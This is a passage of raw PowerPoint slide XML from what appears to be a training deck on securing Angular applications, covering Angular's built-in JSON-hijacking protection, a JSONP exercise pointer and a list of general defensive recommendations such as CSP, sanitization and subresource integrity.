                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23415969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DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du contenu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="937840"/>
            <a:ext cx="8640960" cy="3506118"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Angular(JS) automatically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>strip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>)]}',\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>prefix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>if any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Configure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>your server to prefix: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“)]}',\n”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> before all your JSON responses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>A normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>response of:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		       will be returns as : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6840760" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON Hijacking Angular built-in Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="18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1707654"/>
            <a:ext cx="1381125" cy="447675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>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1707654"/>
            <a:ext cx="1476375" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>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421" y="2211710"/>
            <a:ext cx="8025011" cy="2932728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="ZoneTexte 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21040261">
            <a:off x="6516216" y="3003798"/>
            <a:ext cx="1296144" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>JAX-RS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>implementation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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9899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915566"/>
            <a:ext cx="8856984" cy="3024336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PW - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSONP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:t>Exercises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t>	Follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>practical_works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>/PW-JSONP.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40179063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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6840760" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>		             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Global recommendations</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07504" y="627534"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>the latest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Angular possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" b="1" dirty="0"/>
              <a:t>Use Angular built-in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>protection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(CSRF, XSS, JSON hijacking)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" b="1" dirty="0"/>
              <a:t>Use/recommend using recent browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>CSP3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>subresource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t> integrity, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>” cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>atribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Do not mix client and server templates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Don’t trust user-provided content  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>(don’t bypass sanitization)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>and anti-XSS HTTP headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> (but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>don't rely only on CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Consider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> JWT for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
              <a:t>not trust 3rd party </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>components </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Retire.JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0"/>
              <a:t>, « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1"/>
              <a:t>Subresource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1"/>
              <a:t>integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0"/>
              <a:t> » browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1"/>
              <a:t>feature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Always treat all data read from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t> as untrusted user input.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Angular Security guidelines : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>docs.angularjs.org/guide/security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>angular.io/docs/ts/latest/guide/security.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" i="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160513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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="283500"/>
            <a:ext cx="6509032" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure your AngularJS Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="771550"/>
            <a:ext cx="9001000" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
